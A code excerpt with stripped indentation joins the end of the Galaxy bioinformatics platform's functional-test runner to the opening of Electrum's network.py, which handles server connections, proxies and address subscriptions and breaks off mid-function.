elif source.lower().startswith( ( "http://", "https://", "ftp://" ) ):
urllib.urlretrieve( source, db_path )
else:
raise Exception( "Failed to copy database template from source %s" % source )
def main():
# ---- Configuration ------------------------------------------------------
galaxy_test_host = os.environ.get( 'GALAXY_TEST_HOST', default_galaxy_test_host )
galaxy_test_port = os.environ.get( 'GALAXY_TEST_PORT', None )
galaxy_test_save = os.environ.get( 'GALAXY_TEST_SAVE', None)
tool_path = os.environ.get( 'GALAXY_TEST_TOOL_PATH', 'tools' )
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = default_galaxy_locales
testing_migrated_tools = __check_arg( '-migrated' )
testing_installed_tools = __check_arg( '-installed' )
datatypes_conf_override = None
if testing_migrated_tools or testing_installed_tools:
# Store a jsonified dictionary of tool_id : GALAXY_TEST_FILE_DIR pairs.
galaxy_tool_shed_test_file = 'shed_tools_dict'
# We need the upload tool for functional tests, so we'll create a temporary tool panel config that defines it.
fd, tmp_tool_panel_conf = tempfile.mkstemp()
os.write( fd, '<?xml version="1.0"?>\n' )
os.write( fd, '<toolbox>\n' )
os.write( fd, '<tool file="data_source/upload.xml"/>\n' )
os.write( fd, '</toolbox>\n' )
os.close( fd )
tool_config_file = tmp_tool_panel_conf
galaxy_test_file_dir = None
library_import_dir = None
user_library_import_dir = None
# Exclude all files except test_toolbox.py.
ignore_files = ( re.compile( r'^test_[adghlmsu]*' ), re.compile( r'^test_ta*' ) )
else:
framework_tool_dir = os.path.join('test', 'functional', 'tools')
framework_test = __check_arg( '-framework' ) # Run through suite of tests testing framework.
if framework_test:
tool_conf = os.path.join( framework_tool_dir, 'samples_tool_conf.xml' )
datatypes_conf_override = os.path.join( framework_tool_dir, 'sample_datatypes_conf.xml' )
else:
# Use tool_conf.xml toolbox.
tool_conf = None
if __check_arg( '-with_framework_test_tools' ):
tool_conf = "%s,%s" % ( 'config/tool_conf.xml.sample', os.path.join( framework_tool_dir, 'samples_tool_conf.xml' ) )
test_dir = default_galaxy_test_file_dir
tool_config_file = os.environ.get( 'GALAXY_TEST_TOOL_CONF', tool_conf )
galaxy_test_file_dir = os.environ.get( 'GALAXY_TEST_FILE_DIR', test_dir )
if not os.path.isabs( galaxy_test_file_dir ):
galaxy_test_file_dir = os.path.join( os.getcwd(), galaxy_test_file_dir )
library_import_dir = galaxy_test_file_dir
import_dir = os.path.join( galaxy_test_file_dir, 'users' )
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
ignore_files = ()
start_server = 'GALAXY_TEST_EXTERNAL' not in os.environ
tool_data_table_config_path = None
if os.path.exists( 'tool_data_table_conf.test.xml' ):
# If explicitly defined tables for test, use those.
tool_data_table_config_path = 'tool_data_table_conf.test.xml'
else:
# ... otherise find whatever Galaxy would use as the default and
# the sample data for fucntional tests to that.
default_tool_data_config = 'config/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml' ]:
if os.path.exists( tool_data_config ):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
default_data_manager_config = 'config/data_manager_conf.xml.sample'
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml' ]:
if os.path.exists( data_manager_config ):
default_data_manager_config = data_manager_config
data_manager_config_file = "%s,test/functional/tools/sample_data_manager_conf.xml" % default_data_manager_config
shed_tool_data_table_config = 'config/shed_tool_data_table_conf.xml'
tool_dependency_dir = os.environ.get( 'GALAXY_TOOL_DEPENDENCY_DIR', None )
use_distributed_object_store = os.environ.get( 'GALAXY_USE_DISTRIBUTED_OBJECT_STORE', False )
galaxy_test_tmp_dir = os.environ.get( 'GALAXY_TEST_TMP_DIR', None )
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
galaxy_job_conf_file = os.environ.get( 'GALAXY_TEST_JOB_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_job_conf.xml' ) )
# Generate the job_conf.xml file.
file( galaxy_job_conf_file, 'w' ).write( job_conf_xml )
database_auto_migrate = False
galaxy_test_proxy_port = None
if start_server:
tempdir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
# Configure the database path.
if 'GALAXY_TEST_DBPATH' in os.environ:
galaxy_db_path = os.environ[ 'GALAXY_TEST_DBPATH' ]
else:
galaxy_db_path = os.path.join( tempdir, 'database' )
# Configure the paths Galaxy needs to test tools.
file_path = os.path.join( galaxy_db_path, 'files' )
new_file_path = tempfile.mkdtemp( prefix='new_files_path_', dir=tempdir )
job_working_directory = tempfile.mkdtemp( prefix='job_working_directory_', dir=tempdir )
install_database_connection = os.environ.get( 'GALAXY_TEST_INSTALL_DBURI', None )
if 'GALAXY_TEST_DBURI' in os.environ:
database_connection = os.environ['GALAXY_TEST_DBURI']
else:
db_path = os.path.join( galaxy_db_path, 'universe.sqlite' )
if 'GALAXY_TEST_DB_TEMPLATE' in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
log.debug( "Copying database template from %s.", os.environ['GALAXY_TEST_DB_TEMPLATE'] )
__copy_database_template(os.environ['GALAXY_TEST_DB_TEMPLATE'], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
kwargs = {}
for dir in file_path, new_file_path:
try:
if not os.path.exists( dir ):
os.makedirs( dir )
except OSError:
pass
#Data Manager testing temp path
#For storing Data Manager outputs and .loc files so that real ones don't get clobbered
data_manager_test_tmp_path = tempfile.mkdtemp( prefix='data_manager_test_tmp', dir=galaxy_test_tmp_dir )
galaxy_data_manager_data_path = tempfile.mkdtemp( prefix='data_manager_tool-data', dir=data_manager_test_tmp_path )
# ---- Build Application --------------------------------------------------
master_api_key = get_master_api_key()
app = None
if start_server:
kwargs = dict( admin_users='test@bx.psu.edu',
api_allow_run_as='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
database_connection=database_connection,
database_auto_migrate=database_auto_migrate,
datatype_converters_config_file="datatype_converters_conf.xml.sample",
file_path=file_path,
id_secret='changethisinproductiontoo',
job_queue_workers=5,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
running_functional_tests=True,
shed_tool_data_table_config=shed_tool_data_table_config,
template_path="templates",
test_conf="test.conf",
tool_config_file=tool_config_file,
tool_data_table_config_path=tool_data_table_config_path,
tool_path=tool_path,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
tool_parse_help=False,
update_integrated_tool_panel=False,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
master_api_key=master_api_key,
use_tasked_jobs=True,
enable_beta_tool_formats=True,
data_manager_config_file=data_manager_config_file,
)
if install_database_connection is not None:
kwargs[ 'install_database_connection' ] = install_database_connection
if not database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_max_overflow' ] = '20'
kwargs[ 'database_engine_option_pool_size' ] = '10'
if tool_dependency_dir is not None:
kwargs[ 'tool_dependency_dir' ] = tool_dependency_dir
if use_distributed_object_store:
kwargs[ 'object_store' ] = 'distributed'
kwargs[ 'distributed_object_store_config_file' ] = 'distributed_object_store_conf.xml.sample'
if datatypes_conf_override:
kwargs[ 'datatypes_config_file' ] = datatypes_conf_override
# If the user has passed in a path for the .ini file, do not overwrite it.
galaxy_config_file = os.environ.get( 'GALAXY_TEST_INI_FILE', None )
if not galaxy_config_file:
galaxy_config_file = os.path.join( galaxy_test_tmp_dir, 'functional_tests_wsgi.ini' )
config_items = []
for label in kwargs:
config_tuple = label, kwargs[ label ]
config_items.append( config_tuple )
# Write a temporary file, based on config/galaxy.ini.sample, using the configuration options defined above.
generate_config_file( 'config/galaxy.ini.sample', galaxy_config_file, config_items )
# Set the global_conf[ '__file__' ] option to the location of the temporary .ini file, which gets passed to set_metadata.sh.
kwargs[ 'global_conf' ] = get_webapp_global_conf()
kwargs[ 'global_conf' ][ '__file__' ] = galaxy_config_file
kwargs[ 'config_file' ] = galaxy_config_file
kwargs = load_app_properties(
kwds=kwargs
)
# Build the Universe Application
app = UniverseApplication( **kwargs )
database_contexts.galaxy_context = app.model.context
log.info( "Embedded Universe application started" )
# ---- Run webserver ------------------------------------------------------
server = None
if start_server:
webapp = buildapp.app_factory( kwargs[ 'global_conf' ], app=app,
use_translogger=False, static_enabled=STATIC_ENABLED )
if galaxy_test_port is not None:
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
galaxy_test_port = str( random.randint( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s" % galaxy_test_port )
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
break
except socket.error, e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % ( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
if galaxy_test_proxy_port:
os.environ['GALAXY_TEST_PORT'] = galaxy_test_proxy_port
else:
os.environ['GALAXY_TEST_PORT'] = galaxy_test_port
t = threading.Thread( target=server.serve_forever )
t.start()
# Test if the server is up
for i in range( 10 ):
conn = httplib.HTTPConnection( galaxy_test_host, galaxy_test_port ) # directly test the app, not the proxy
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
log.info( "Embedded web server started" )
# ---- Find tests ---------------------------------------------------------
if galaxy_test_proxy_port:
log.info( "Functional tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_proxy_port ) )
else:
log.info( "Functional tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_port ) )
success = False
try:
tool_configs = app.config.tool_configs
# What requires these? Handy for (eg) functional tests to save outputs?
if galaxy_test_save:
os.environ[ 'GALAXY_TEST_SAVE' ] = galaxy_test_save
# Pass in through script setenv, will leave a copy of ALL test validate files
os.environ[ 'GALAXY_TEST_HOST' ] = galaxy_test_host
def _run_functional_test( testing_shed_tools=None ):
workflow_test = __check_arg( '-workflow', param=True )
if workflow_test:
import functional.workflow
functional.workflow.WorkflowTestCase.workflow_test_file = workflow_test
functional.workflow.WorkflowTestCase.master_api_key = master_api_key
functional.workflow.WorkflowTestCase.user_api_key = get_user_api_key()
data_manager_test = __check_arg( '-data_managers', param=False )
if data_manager_test:
import functional.test_data_managers
functional.test_data_managers.data_managers = app.data_managers #seems like a hack...
functional.test_data_managers.build_tests(
tmp_dir=data_manager_test_tmp_path,
testing_shed_tools=testing_shed_tools,
master_api_key=master_api_key,
user_api_key=get_user_api_key(),
)
else:
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = app.toolbox
# When testing data managers, do not test toolbox.
functional.test_toolbox.build_tests(
app=app,
testing_shed_tools=testing_shed_tools,
master_api_key=master_api_key,
user_api_key=get_user_api_key(),
)
test_config = nose.config.Config( env=os.environ, ignoreFiles=ignore_files, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.plugins.addPlugin( StructuredTestDataPlugin() )
test_config.configure( sys.argv )
result = run_tests( test_config )
success = result.wasSuccessful()
return success
if testing_migrated_tools or testing_installed_tools:
shed_tools_dict = {}
if testing_migrated_tools:
has_test_data, shed_tools_dict = parse_tool_panel_config( migrated_tool_panel_config, shed_tools_dict )
elif testing_installed_tools:
for shed_tool_config in installed_tool_panel_configs:
has_test_data, shed_tools_dict = parse_tool_panel_config( shed_tool_config, shed_tools_dict )
# Persist the shed_tools_dict to the galaxy_tool_shed_test_file.
shed_tools_file = open( galaxy_tool_shed_test_file, 'w' )
shed_tools_file.write( dumps( shed_tools_dict ) )
shed_tools_file.close()
if not os.path.isabs( galaxy_tool_shed_test_file ):
galaxy_tool_shed_test_file = os.path.join( os.getcwd(), galaxy_tool_shed_test_file )
os.environ[ 'GALAXY_TOOL_SHED_TEST_FILE' ] = galaxy_tool_shed_test_file
if testing_installed_tools:
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join( app.config.root, migrated_tool_panel_config )
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove( relative_migrated_tool_panel_config )
for installed_tool_panel_config in installed_tool_panel_configs:
tool_configs.append( installed_tool_panel_config )
app.toolbox = tools.ToolBox( tool_configs, app.config.tool_path, app )
success = _run_functional_test( testing_shed_tools=True )
try:
os.unlink( tmp_tool_panel_conf )
except:
log.info( "Unable to remove temporary file: %s" % tmp_tool_panel_conf )
try:
os.unlink( galaxy_tool_shed_test_file )
except:
log.info( "Unable to remove file: %s" % galaxy_tool_shed_test_file )
else:
if galaxy_test_file_dir:
os.environ[ 'GALAXY_TEST_FILE_DIR' ] = galaxy_test_file_dir
success = _run_functional_test( )
except:
log.exception( "Failure running tests" )
log.info( "Shutting down" )
# ---- Tear down -----------------------------------------------------------
if server:
log.info( "Shutting down embedded web server" )
server.server_close()
server = None
log.info( "Embedded web server stopped" )
if app:
log.info( "Shutting down app" )
app.shutdown()
app = None
log.info( "Embedded Universe application stopped" )
try:
if os.path.exists( tempdir ) and 'GALAXY_TEST_NO_CLEANUP' not in os.environ:
log.info( "Cleaning up temporary files in %s" % tempdir )
shutil.rmtree( tempdir )
else:
log.info( "GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir )
except:
pass
if success:
return 0
else:
return 1
def __check_arg( name, param=False ):
try:
index = sys.argv.index( name )
del sys.argv[ index ]
if param:
ret_val = sys.argv[ index ]
del sys.argv[ index ]
else:
ret_val = True
except ValueError:
ret_val = False
return ret_val
if __name__ == "__main__":
sys.exit( main() )
|
network.py |
# Electrum - Lightweight Bitcoin Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
import queue
import os
import stat
import errno
import sys
import random
import select
import traceback
from collections import defaultdict, deque
import threading
import socket
import json
import socks
from . import util
from . import bitcoin
from .bitcoin import *
from .interface import Connection, Interface
from . import blockchain
from .version import ELECTRUM_VERSION, PROTOCOL_VERSION
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
""" parse servers list into dict format"""
from .version import PROTOCOL_VERSION
servers = {}
for item in result:
host = item[1]
out = {}
version = None
pruning_level = '-'
if len(item) > 2:
for v in item[2]:
if re.match("[st]\d*", v):
protocol, port = v[0], v[1:]
if port == '': port = bitcoin.DEFAULT_PORTS[protocol]
out[protocol] = port
elif re.match("v(.?)+", v):
version = v[1:]
elif re.match("p\d*", v):
pruning_level = v[1:]
if pruning_level == '': pruning_level = '0'
if out:
out['pruning'] = pruning_level
out['version'] = version
servers[host] = out
return servers
def filter_version(servers):
def is_recent(version):
try:
return util.normalize_version(version) >= util.normalize_version(PROTOCOL_VERSION)
except Exception as e:
return False
return {k: v for k, v in servers.items() if is_recent(v.get('version'))}
def filter_protocol(hostmap, protocol = 's'):
'''Filters the hostmap for those implementing protocol.
The result is a list in serialized form.'''
eligible = []
for host, portmap in hostmap.items():
port = portmap.get(protocol)
if port:
eligible.append(serialize_server(host, port, protocol))
return eligible
def pick_random_server(hostmap = None, protocol = 's', exclude_set = set()):
if hostmap is None:
hostmap = bitcoin.DEFAULT_SERVERS
eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
return random.choice(eligible) if eligible else None
from .simple_config import SimpleConfig
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
if not isinstance(p, dict):
return None
return ':'.join([p.get('mode'),p.get('host'), p.get('port'), p.get('user'), p.get('password')])
def deserialize_proxy(s):
if not isinstance(s, str):
return None
if s.lower() == 'none':
return None
proxy = { "mode":"socks5", "host":"localhost" }
args = s.split(':')
n = 0
if proxy_modes.count(args[n]) == 1:
proxy["mode"] = args[n]
n += 1
if len(args) > n:
proxy["host"] = args[n]
n += 1
if len(args) > n:
proxy["port"] = args[n]
n += 1
else:
proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
if len(args) > n:
proxy["user"] = args[n]
n += 1
if len(args) > n:
proxy["password"] = args[n]
return proxy
def deserialize_server(server_str):
host, port, protocol = str(server_str).split(':')
assert protocol in 'st'
int(port) # Throw if cannot be converted to int
return host, port, protocol
def serialize_server(host, port, protocol):
return str(':'.join([host, port, protocol]))
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
def __init__(self, config=None):
if config is None:
config = {} # Do not use mutables as default values!
util.DaemonThread.__init__(self)
self.config = SimpleConfig(config) if isinstance(config, dict) else config
self.num_server = 10 if not self.config.get('oneserver') else 0
self.blockchains = blockchain.read_blockchains(self.config)
self.print_error("blockchains", self.blockchains.keys())
self.blockchain_index = config.get('blockchain_index', 0)
if self.blockchain_index not in self.blockchains.keys():
self.blockchain_index = 0
# Server for addresses and transactions
self.default_server = self.config.get('server')
# Sanitize default server
try:
deserialize_server(self.default_server)
except:
self.default_server = None
if not self.default_server:
self.default_server = pick_random_server()
self.lock = threading.Lock()
self.pending_sends = []
self.message_id = 0
self.debug = False
self.irc_servers = {} # returned by interface (list from irc)
self.recent_servers = self.read_recent_servers()
self.banner = ''
self.donation_address = ''
self.relay_fee = None
# callbacks passed with subscriptions
self.subscriptions = defaultdict(list)
self.sub_cache = {}
# callbacks set by the GUI
self.callbacks = defaultdict(list)
dir_path = os.path.join( self.config.path, 'certs')
if not os.path.exists(dir_path):
os.mkdir(dir_path)
os.chmod(dir_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
# subscriptions and requests
self.subscribed_addresses = set()
self.h2addr = {}
# Requests from client we've not seen a response to
self.unanswered_requests = {}
# retry times
self.server_retry_time = time.time()
self.nodes_retry_time = time.time()
# kick off the network. interface is the main server we are currently
# communicating with. interfaces is the set of servers we are connecting
# to or have an ongoing connection with
self.interface = None
self.interfaces = {}
self.auto_connect = self.config.get('auto_connect', True)
self.connecting = set()
self.socket_queue = queue.Queue()
self.start_network(deserialize_server(self.default_server)[2],
deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
with self.lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.lock:
callbacks = self.callbacks[event][:]
[callback(event, *args) for callback in callbacks]
def read_recent_servers(self):
if not self.config.path:
return []
path = os.path.join(self.config.path, "recent_servers")
try:
with open(path, "r") as f:
data = f.read()
return json.loads(data)
except:
return []
def save_recent_servers(self):
if not self.config.path:
return
path = os.path.join(self.config.path, "recent_servers")
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(path, "w") as f:
f.write(s)
except:
pass
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
return result
def set_status(self, status):
self.connection_status = status
self.notify('status')
def is_connected(self):
return self.interface is not None
def is_connecting(self):
return self.connection_status == 'connecting'
def is_up_to_date(self):
return self.unanswered_requests == {}
def queue_request(self, method, params, interface=None):
# If you want to queue a request on any interface it must go
# through this function so message ids are properly tracked
if interface is None:
interface = self.interface
message_id = self.message_id
self.message_id += 1
if self.debug:
self.print_error(interface.host, "-->", method, params, message_id)
interface.queue_request(method, params, message_id)
return message_id
def send_subscriptions(self):
self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests), len(self.subscribed_addresses))
self.sub_cache.clear()
# Resend unanswered requests
requests = self.unanswered_requests.values()
self.unanswered_requests = {}
for request in requests:
message_id = self.queue_request(request[0], request[1])
self.unanswered_requests[message_id] = request
self.queue_request('server.banner', [])
self.queue_request('server.donation_address', [])
self.queue_request('server.peers.subscribe', [])
self.request_fee_estimates()
self.queue_request('blockchain.relayfee', [])
if self.interface.ping_required():
params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, self.interface)
for h in self.subscribed_addresses:
self.queue_request('blockchain.scripthash.subscribe', [h])
def request_fee_estimates(self):
self.config.requested_fee_estimates()
for i in bitcoin.FEE_TARGETS:
self.queue_request('blockchain.estimatefee', [i])
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'updated':
value = (self.get_local_height(), self.get_server_height())
elif key == 'servers':
value = self.get_servers()
elif key == 'interfaces':
value = self.get_interfaces()
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self):
host, port, protocol = deserialize_server(self.default_server)
return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
if self.is_connected():
return self.donation_address
def get_interfaces(self):
'''The interfaces that are in connected state'''
return list(self.interfaces.keys())
def get_servers(self):
out = bitcoin.DEFAULT_SERVERS
if self.irc_servers:
out.update(filter_version(self.irc_servers.copy()))
else:
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = { protocol:port }
return out
def start_interface(self, server):
if (not server in self.interfaces and not server in self.connecting):
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
def start_interfaces(self):
self.start_interface(self.default_server)
for i in range(self.num_server - 1):
self.start_random_interface()
def set_proxy(self, proxy):
self.proxy = proxy
# Store these somewhere so we can un-monkey-patch
if not hasattr(socket, "_socketobject"):
socket._socketobject = socket.socket
socket._getaddrinfo = socket.getaddrinfo
if proxy:
self.print_error('setting proxy', proxy)
proxy_mode = proxy_modes.index(proxy["mode"]) + 1
socks.setdefaultproxy(proxy_mode,
proxy["host"],
int(proxy["port"]),
# socks.py seems to want either None or a non-empty string
username=(proxy.get("user", "") or None),
password=(proxy.get("password", "") or None))
socket.socket = socks.socksocket
# prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
else:
socket.socket = socket._socketobject
socket.getaddrinfo = socket._getaddrinfo
def start_network(self, protocol, proxy):
assert not self.interface and not self.interfaces
assert not self.connecting and self.socket_queue.empty()
self.print_error('starting network')
self.disconnected_servers = set([])
self.protocol = protocol
self.set_proxy(proxy)
self.start_interfaces()
def stop_network(self):
self.print_error("stopping network")
for interface in list(self.interfaces.values()):
self.close_interface(interface)
if self.interface:
self.close_interface(self.interface)
assert self.interface is None
assert not self.interfaces
self.connecting = set()
# Get a new queue - no old pending connections thanks!
self.socket_queue = queue.Queue()
def set_parameters(self, host, port, protocol, proxy, auto_connect):
proxy_str = serialize_proxy(proxy)
server = serialize_server(host, port, protocol)
# sanitize parameters
try:
deserialize_server(serialize_server(host, port, protocol))
if proxy:
proxy_modes.index(proxy["mode"]) + 1
int(proxy['port'])
except:
return
self.config.set_key('auto_connect', auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server, True)
# abort if changes were not allowed by config
if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
return
self.auto_connect = auto_connect
if self.proxy != proxy or self.protocol != protocol:
# Restart the network defaulting to the given server
self.stop_network()
self.default_server = server
self.start_network(protocol, proxy)
elif self.default_server != server:
self.switch_to_interface(server)
else:
self.switch_lagging_interface()
self.notify('updated')
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
filtered = list(map(lambda x:x[0], filter(lambda x: x[1].tip_header==header, self.interfaces.items())))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
def switch_to_interface(self, server):
'''Switch to server as our interface. If no connection exists nor
being opened, start a thread to connect. The actual switch will
happen on receipt of the connection notification. Do nothing
if server already is our interface.'''
self.default_server = server
if server not in self.interfaces:
self.interface = None
self.start_interface(server)
return
i = self.interfaces[server]
if self.interface != i:
self.print_error("switching to", server)
# stop any current interface in order to terminate subscriptions
# fixme: we don't want to close headers sub
#self.close_interface(self.interface)
self.interface = i
self.send_subscriptions()
self.set_status('connected')
self.notify('updated')
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
def process_response(self, interface, response, callbacks):
if self.debug:
self.print_error("<--", response)
error = response.get('error')
result = response.get('result')
method = response.get('method')
params = response.get('params')
# We handle some responses; return the rest to the client.
if method == 'server.version':
interface.server_version = result
elif method == 'blockchain.headers.subscribe':
if error is None:
self.on_notify_header(interface, result)
elif method == 'server.peers.subscribe':
if error is None:
self.irc_servers = parse_servers(result)
self.notify('servers')
elif method == 'server.banner':
if error is None:
self.banner = result
self.notify('banner')
elif method == 'server.donation_address':
if error is None:
self.donation_address = result
elif method == 'blockchain.estimatefee':
if error is None and result > 0:
i = params[0]
fee = int(result*COIN)
self.config.update_fee_estimates(i, fee)
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
elif method == 'blockchain.relayfee':
if error is None:
self.relay_fee = int(result * COIN)
self.print_error("relayfee", self.relay_fee)
elif method == 'blockchain.block.get_chunk':
self.on_get_chunk(interface, response)
elif method == 'blockchain.block.get_header':
self.on_get_header(interface, response)
for callback in callbacks:
callback(response)
def get_index(self, method, params):
""" hashable index for subscriptions and cache"""
return str(method) + (':' + str(params[0]) if params else '')
def process_responses(self, interface):
responses = interface.get_responses()
for request, response in responses:
if request:
method, params, message_id = request
k = self.get_index(method, params)
# client requests go through self.send() with a
# callback, are only sent to the current interface,
# and are placed in the unanswered_requests dictionary
client_req = self.unanswered_requests.pop(message_id, None)
if client_req:
assert interface == self.interface
callbacks = [client_req[2]]
else:
# fixme: will only work for subscriptions
k = self.get_index(method, params)
callbacks = self.subscriptions.get(k, [])
# Copy the request method and params to the response
response['method'] = method
response['params'] = params
# Only once we've received a response to an addr subscription
# add it to the list; avoids double-sends on reconnection
if method == 'blockchain.scripthash.subscribe':
self.subscribed_addresses.add(params[0])
else:
if not response: # Closed remotely / misbehaving
self.connection_down(interface.server)
break
# Rewrite response shape to match subscription request response
method = response.get('method')
params = response.get('params')
k = self.get_index(method, params)
if method == 'blockchain.headers.subscribe':
response['result'] = params[0]
response['params'] = []
elif method == 'blockchain.scripthash.subscribe':
response['params'] = [params[0]] # addr
response['result'] = params[1]
callbacks = self.subscriptions.get(k, [])
# update cache if it's a subscription
if method.endswith('.subscribe'):
self.sub_cache[k] = response
# Response is now in canonical form
self.process_response(interface, response, callbacks)
def addr_to_scripthash(self, addr):
h = bitcoin.address_to_scripthash(addr)
if h not in self.h2addr:
self.h2addr[h] = addr
return h
def overload_cb(self, callback):
def cb2(x):
x2 = x.copy()
p = x2.pop('params')
addr = self.h2addr[p[0]]
x2['params'] = [addr]
callback(x2)
return cb2
def subscribe_to_addresses(self, addresses, callback):
hashes = [self.addr_to_scripthash(addr) for addr in addresses]
msgs = [('blockchain.scripthash.subscribe', [x]) for x in hashes]
self.send(msgs, self.overload_cb(callback))
def request_address_history(self, address, callback):
h = self.addr_to_scripthash(address)
self.send([('blockchain.scripthash.get_history', [h])], self.overload_cb(callback))
def send(self, messages, callback):
'''Messages is a list of (method, params) tuples'''
messages = list(messages)
with self.lock:
